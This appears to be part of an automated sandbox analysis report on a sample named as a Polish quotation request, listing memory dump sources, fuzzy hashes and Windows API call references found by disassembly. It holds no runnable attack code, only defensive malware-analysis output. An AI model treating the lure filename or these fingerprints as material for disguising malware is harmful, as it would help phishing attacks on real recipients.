                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1489400265-0
                                                                                                                                                                                                                                                      • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                      • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1042038666-0
                                                                                                                                                                                                                                                      • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                      • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                                                                                      • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                      • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 132634196-0
                                                                                                                                                                                                                                                      • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                      • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                                                                                                                                        • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                                                                                                                                      • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3798957060-0
                                                                                                                                                                                                                                                      • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                      • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1537469427-0
                                                                                                                                                                                                                                                      • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                      • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                                      • String ID: '$[$h
                                                                                                                                                                                                                                                      • API String ID: 2931989736-1224472061
                                                                                                                                                                                                                                                      • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                      • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _strncmp
                                                                                                                                                                                                                                                      • String ID: >$R$U
                                                                                                                                                                                                                                                      • API String ID: 909875538-1924298640
                                                                                                                                                                                                                                                      • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                      • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                                                                                                      • String ID: 4RH
                                                                                                                                                                                                                                                      • API String ID: 2981388473-749298218
                                                                                                                                                                                                                                                      • Opcode ID: 45854ddf14939e02fef8711bd8717db5b1d367d31beb3427e15a75496be4afa5
                                                                                                                                                                                                                                                      • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45854ddf14939e02fef8711bd8717db5b1d367d31beb3427e15a75496be4afa5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                      • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                      • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                      • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                      • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocTask_wcslen
                                                                                                                                                                                                                                                      • String ID: hkG
                                                                                                                                                                                                                                                      • API String ID: 2651040394-3610518997
